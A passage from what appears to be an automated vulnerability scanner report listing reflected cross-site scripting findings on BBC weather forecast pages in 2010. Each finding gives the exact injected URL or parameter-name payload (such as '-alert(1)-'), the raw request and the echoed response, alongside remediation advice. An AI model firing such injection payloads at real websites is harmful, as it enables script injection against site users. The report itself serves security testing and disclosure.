User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8
Date: Thu, 16 Dec 2010 19:35:22 GMT
Keep-Alive: timeout=10, max=771
Connection: close
Set-Cookie: BBC-UID=644d900a26894fbafe97fdd331bcb67313ea585d40c0b1894b8b325a660c84560Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:22 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=644d900a26894fbafe97fdd331bcb67313ea585d40c0b1894b8b325a660c84560Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:22 GMT; path=/; domain=bbc.co.uk;
X-Cache-Info: caching
X-Powered-By: PHP/5.2.5
Content-Length: 38266


               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528122000,
       editionToServe: null,
       queryString: '462dd'-alert(1)-'47f7f6e1ce0=1',
       referrer: null,
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'weather',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/weather/',
       country:
...[SNIP]...

2.38. http://news.bbc.co.uk/weather/forecast/2098/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /weather/forecast/2098/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34b9d'-alert(1)-'b81e7bf2f3e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/forecast/34b9d'-alert(1)-'b81e7bf2f3e/ HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10042|J08781_10139|J08781_10216|J08781_10277; BBC-UID=048de0da76396d645de62f03e16c7e10505ea811e050412f32a9f0fcf600f7a60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; BBCWCW=*********************8*London*0***********1*v54_3; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8
Date: Thu, 16 Dec 2010 19:43:52 GMT
Keep-Alive: timeout=10, max=740
Connection: close
X-Powered-By: PHP/5.2.5
Content-Length: 58321


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...
'loc=34',
       referrer: null,
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'weather',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/weather/forecast/34b9d'-alert(1)-'b81e7bf2f3e/',
       country: 'us',
       masthead: false,
       adKeyword: null,
       templateVersion: null
   }
-->
...[SNIP]...

2.39. http://news.bbc.co.uk/weather/forecast/2098/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /weather/forecast/2098/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbbfe'-alert(1)-'68d7159b507 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/forecast/2098/?bbbfe'-alert(1)-'68d7159b507=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10042|J08781_10139|J08781_10216|J08781_10277; BBC-UID=048de0da76396d645de62f03e16c7e10505ea811e050412f32a9f0fcf600f7a60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; BBCWCW=*********************8*London*0***********1*v54_3; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8
Date: Thu, 16 Dec 2010 19:52:21 GMT
Keep-Alive: timeout=10, max=774
Connection: close
X-Powered-By: PHP/5.2.5
Content-Length: 59277


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292529141000,
       editionToServe: null,
       queryString: 'loc=2098&amp;bbbfe'-alert(1)-'68d7159b507=1',
       referrer: null,
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'weather',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/weather/forecast/2098/
...[SNIP]...

2.40. http://news.bbc.co.uk/weather/forecast/2302/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://news.bbc.co.uk
Path:   /weather/forecast/2302/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c5e4'%3bf85b5a5c034 was submitted in the REST URL parameter 3. This input was echoed as 4c5e4';f85b5a5c034 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/forecast/4c5e4'%3bf85b5a5c034/ HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10042|J08781_10139|J08781_10216|J08781_10277; BBC-UID=048de0da76396d645de62f03e16c7e10505ea811e050412f32a9f0fcf600f7a60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; BBCWCW=*********************8*London*0***********1*v54_3; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8
Date: Thu, 16 Dec 2010 19:47:19 GMT
Keep-Alive: timeout=10, max=729
Connection: close
X-Powered-By: PHP/5.2.5
Content-Length: 59300


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...
'loc=4',
       referrer: null,
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'weather',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/weather/forecast/4c5e4';f85b5a5c034/',
       country: 'us',
       masthead: false,
       adKeyword: null,
       templateVersion: null
   }
-->
...[SNIP]...

2.41. http://news.bbc.co.uk/weather/forecast/2302/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /weather/forecast/2302/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6a80'-alert(1)-'0a292c74b5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/forecast/2302/?d6a80'-alert(1)-'0a292c74b5d=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10042|J08781_10139|J08781_10216|J08781_10277; BBC-UID=048de0da76396d645de62f03e16c7e10505ea811e050412f32a9f0fcf600f7a60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; BBCWCW=*********************8*London*0***********1*v54_3; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8
Date: Thu, 16 Dec 2010 19:52:19 GMT
Keep-Alive: timeout=10, max=792
Connection: close
X-Powered-By: PHP/5.2.5
Content-Length: 59165


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292529139000,
       editionToServe: null,
       queryString: 'loc=2302&amp;d6a80'-alert(1)-'0a292c74b5d=1',
       referrer: null,
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'weather',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/weather/forecast/2302/
...[SNIP]...

2.42. http://news.bbc.co.uk/weather/forecast/2389/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /weather/forecast/2389/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 961a6'%3balert(1)//9c8bd98f3f0 was submitted in the REST URL parameter 3. This input was echoed as 961a6';alert(1)//9c8bd98f3f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/forecast/961a6'%3balert(1)//9c8bd98f3f0/ HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10042|J08781_10139|J08781_10216|J08781_10277; BBC-UID=048de0da76396d645de62f03e16c7e10505ea811e050412f32a9f0fcf600f7a60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; BBCWCW=*********************8*London*0***********1*v54_3; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8
Date: Thu, 16 Dec 2010 19:52:50 GMT
Keep-Alive: timeout=10, max=469
Connection: close
X-Powered-By: PHP/5.2.5
Content-Length: 58225


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...
loc=961',
       referrer: null,
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'weather',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/weather/forecast/961a6';alert(1)//9c8bd98f3f0/',
       country: 'us',
       masthead: false,
       adKeyword: null,
       templateVersion: null
   }
-->
...[SNIP]...

2.43. http://news.bbc.co.uk/weather/forecast/2389/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /weather/forecast/2389/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db678'-alert(1)-'061c13003d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/forecast/2389/?db678'-alert(1)-'061c13003d1=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10042|J08781_10139|J08781_10216|J08781_10277; BBC-UID=048de0da76396d645de62f03e16c7e10505ea811e050412f32a9f0fcf600f7a60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; BBCWCW=*********************8*London*0***********1*v54_3; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8
Date: Thu, 16 Dec 2010 19:52:21 GMT
Keep-Alive: timeout=10, max=799
Connection: close
X-Powered-By: PHP/5.2.5
Content-Length: 59179


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292529141000,
       editionToServe: null,
       queryString: 'loc=2389&amp;db678'-alert(1)-'061c13003d1=1',
       referrer: null,
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'weather',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/weather/forecast/2389/
...[SNIP]...

2.44. http://news.bbc.co.uk/weather/forecast/4296/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /weather/forecast/4296/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91e42'-alert(1)-'c6e009cacf4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/forecast/91e42'-alert(1)-'c6e009cacf4/ HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10042|J08781_10139|J08781_10216|J08781_10277; BBC-UID=048de0da76396d645de62f03e16c7e10505ea811e050412f32a9f0fcf600f7a60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; BBCWCW=*********************8*London*0***********1*v54_3; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8
Date: Thu, 16 Dec 2010 19:52:47 GMT
Keep-Alive: timeout=10, max=764
Connection: close
X-Powered-By: PHP/5.2.5
Content-Length: 58433


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...
'loc=91',
       referrer: null,
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'weather',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/weather/forecast/91e42'-alert(1)-'c6e009cacf4/',
       country: 'us',
       masthead: false,
       adKeyword: null,
       templateVersion: null
   }
-->
...[SNIP]...

2.45. http://news.bbc.co.uk/weather/forecast/4296/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /weather/forecast/4296/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca7b5'-alert(1)-'b50712ec32f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/forecast/4296/?ca7b5'-alert(1)-'b50712ec32f=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10042|J08781_10139|J08781_10216|J08781_10277; BBC-UID=048de0da76396d645de62f03e16c7e10505ea811e050412f32a9f0fcf600f7a60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; BBCWCW=*********************8*London*0***********1*v54_3; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8
Date: Thu, 16 Dec 2010 19:52:22 GMT
Keep-Alive: timeout=10, max=799
Connection: close
X-Powered-By: PHP/5.2.5
Content-Length: 59284


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292529142000,
       editionToServe: null,
       queryString: 'loc=4296&amp;ca7b5'-alert(1)-'b50712ec32f=1',
       referrer: null,
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'weather',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/weather/forecast/4296/
...[SNIP]...

2.46. http://news.bbc.co.uk/weather/forecast/8 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://news.bbc.co.uk
Path:   /weather/forecast/8

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e09c3'%3bd90af0d6ed8 was submitted in the REST URL parameter 3. This input was echoed as e09c3';d90af0d6ed8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/forecast/8e09c3'%3bd90af0d6ed8 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8
Date: Thu, 16 Dec 2010 19:26:23 GMT
Keep-Alive: timeout=10, max=679
Connection: close
Set-Cookie: BBC-UID=14dd50aa46f96ccfd1468d901110e169c3f1d12e60a0310a241baa452db0aaca0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:34:39 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=14dd50aa46f96ccfd1468d901110e169c3f1d12e60a0310a241baa452db0aaca0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:34:39 GMT; path=/; domain=bbc.co.uk;
X-Powered-By: PHP/5.2.5
X-Cache-Info: cached
Content-Length: 58366


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...
'loc=8',
       referrer: null,
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'weather',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/weather/forecast/8e09c3';d90af0d6ed8',
       country: 'us',
       masthead: false,
       adKeyword: null,
       templateVersion: null
   }
-->
...[SNIP]...

2.47. http://news.bbc.co.uk/weather/forecast/8 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /weather/forecast/8

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca60e'-alert(1)-'5353458cb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/forecast/8?ca60e'-alert(1)-'5353458cb0=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8
Date: Thu, 16 Dec 2010 19:34:09 GMT
Keep-Alive: timeout=10, max=745
Connection: close
Set-Cookie: BBC-UID=f4ad00fa4659dbe1ee879cd1212641c463569e3bb040e159ebab13fe5e8b7c1e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:34:09 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=f4ad00fa4659dbe1ee879cd1212641c463569e3bb040e159ebab13fe5e8b7c1e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:34:09 GMT; path=/; domain=bbc.co.uk;
X-Cache-Info: caching
X-Powered-By: PHP/5.2.5
Content-Length: 58292


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528049000,
       editionToServe: null,
       queryString: 'loc=8&amp;ca60e'-alert(1)-'5353458cb0=1',
       referrer: null,
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'weather',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/weather/forecast/8',

...[SNIP]...

2.48. http://news.bbc.co.uk/weather/forecast/8/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://news.bbc.co.uk
Path:   /weather/forecast/8/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44f24'%3b6d730b941e0 was submitted in the REST URL parameter 3. This input was echoed as 44f24';6d730b941e0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/forecast/844f24'%3b6d730b941e0/ HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10042|J08781_10139|J08781_10216|J08781_10277; BBC-UID=048de0da76396d645de62f03e16c7e10505ea811e050412f32a9f0fcf600f7a60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; BBCWCW=*********************8*London*0***********1*v54_3; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8
Date: Thu, 16 Dec 2010 19:52:49 GMT
Keep-Alive: timeout=10, max=794
Connection: close
X-Powered-By: PHP/5.2.5
Content-Length: 58355


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...
oc=844',
       referrer: null,
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'weather',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/weather/forecast/844f24';6d730b941e0/',
       country: 'us',
       masthead: false,
       adKeyword: null,
       templateVersion: null
   }
-->
...[SNIP]...

2.49. http://news.bbc.co.uk/weather/forecast/8/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /weather/forecast/8/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bacb0'-alert(1)-'b5094ca4d91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/forecast/8/?bacb0'-alert(1)-'b5094ca4d91=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: rsi_segs=J08781_10042|J08781_10139|J08781_10216|J08781_10277; BBC-UID=048de0da76396d645de62f03e16c7e10505ea811e050412f32a9f0fcf600f7a60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; BBCWCW=*********************8*London*0***********1*v54_3; __qca=P0-1418742289-1292527596489;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8
Date: Thu, 16 Dec 2010 19:52:17 GMT
Keep-Alive: timeout=10, max=793
Connection: close
X-Powered-By: PHP/5.2.5
Content-Length: 59291


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292529137000,
       editionToServe: null,
       queryString: 'loc=8&amp;bacb0'-alert(1)-'b5094ca4d91=1',
       referrer: null,
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'weather',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/weather/forecast/8/',
...[SNIP]...

2.50. http://news.bbc.co.uk/weather/forecast/8/MapPresenterInner.json [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://news.bbc.co.uk
Path:   /weather/forecast/8/MapPresenterInner.json

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c2cd'%3b66886aa86f8 was submitted in the REST URL parameter 3. This input was echoed as 6c2cd';66886aa86f8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /weather/forecast/86c2cd'%3b66886aa86f8/MapPresenterInner.json HTTP/1.1
Host: news.bbc.co.uk
Proxy-Connection: keep-alive
Referer: http://news.bbc.co.uk/weather/forecast/8
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BBCWCW=*********************8*London*0***********1*v54_3; __qca=P0-1418742289-1292527596489; rsi_segs=J08781_10139|J08781_10277; BBC-UID=048de0da76396d645de62f03e16c7e10505ea811e050412f32a9f0fcf600f7a60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 19:48:44 GMT
Server: Apache
Cache-Control: max-age=0
X-Powered-By: PHP/5.2.5
Content-Type: text/html; charset=UTF-8
Content-Length: 56683


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...
.co.uk/weather/forecast/8',
       section: null,
